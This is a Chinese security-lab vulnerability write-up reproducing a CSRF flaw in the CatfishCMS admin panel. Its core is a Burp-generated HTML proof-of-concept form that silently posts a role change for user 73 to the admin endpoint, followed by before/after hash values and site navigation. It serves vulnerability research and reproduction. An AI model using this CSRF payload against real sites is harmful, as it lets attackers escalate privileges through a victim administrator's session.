CatfishCMS后台csrf-漏洞文库小世界-安全文库-NGC660安全实验室

CatfishCMS后台csrf

好想告诉你徽章-备受喜爱-NGC660安全实验室等级-LV4-NGC660安全实验室1年前发布
110

CatfishCMS后台csrf

复现过程

首先需要登录后台

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://url/index.php/admin/index/modifymanage.html?c=73" method="POST">
      <input type="hidden" name="uid" value="73" />
      <input type="hidden" name="juese" value="3" />
      <input type="hidden" name="verification" value="05f176843c20e12c1364e80b9869ac17" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

修改前

1f3961e5537b04d3503d0b14e89fc4e7

修改后

a23ea49ad2e247a39941066fef9c6ca5

评分
欢迎为Ta评分
赏点小钱
分享
请登录后发表评论

    请登录后查看回复内容

用户封面
好想告诉你的头像-NGC660安全实验室
【作业】下内网之隧道代理05.17
【作业】5.10 漏洞复现-Thinkphp+shiro550+log4j2
CSZ CMS 1.2.7 储存型xss
CVE-2019-13086 CSZ CMS 1.2.2 sql注入漏洞
CVE-2018-7662 Couchcms 2.0 存在路径泄露漏洞
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具-NGC660安全实验室
2.6W+人已阅读
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具
TOP1
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant-NGC660安全实验室
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant
2年前6733人已阅读
TOP2
HTB靶机渗透系列之Sniper -NGC660安全实验室
HTB靶机渗透系列之Sniper 
2年前5781人已阅读
TOP3
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击-NGC660安全实验室
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
2年前1447人已阅读
TOP4
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉-NGC660安全实验室
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉
2年前1391人已阅读
TOP5
【初级】Next.js目录遍历-NGC660安全实验室
【初级】Next.js目录遍历
2年前1170人已阅读
TOP6
【初级】WP Statistics SQL注入 (CVE-2022-25149)-NGC660安全实验室
【初级】WP Statistics SQL注入 (CVE-2022-25149)
2年前905人已阅读
TOP7
【初级】jira 未授权访问-NGC660安全实验室
【初级】jira 未授权访问
2年前731人已阅读
TOP8
【初级】artifactory 未授权访问-NGC660安全实验室
【初级】artifactory 未授权访问
2年前697人已阅读
TOP9
网络安全应急响应工具包合集-NGC660安全实验室
网络安全应急响应工具包合集
1年前668人已阅读
TOP10
圈子开耕者
分类-最近更新-NGC660安全实验室 11.5W+
最近更新
最近更新文章...
468篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
SubOver:一款功能强大的子域名接管测试工具
1年前
如何使用53R3N17Y完成主机网络侦查和信息收集任务
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
如何使用DragonCastle从LSASS进程中提取NTLM哈希
1年前
分类-安全新闻-NGC660安全实验室 2.1W+
安全新闻
分享安全时事,安全新闻播报推送
86篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
探析人工智能对网络安全的真正潜在影响
1年前
微信闪退BUG:一张神奇的二维码图片
1年前
印度跨国银行遭遇数据泄露,数百万敏感数据被公开访问
1年前
发布文章发布尘埃
扫码添加微信-NGC660安全实验室
在手机上浏览此页面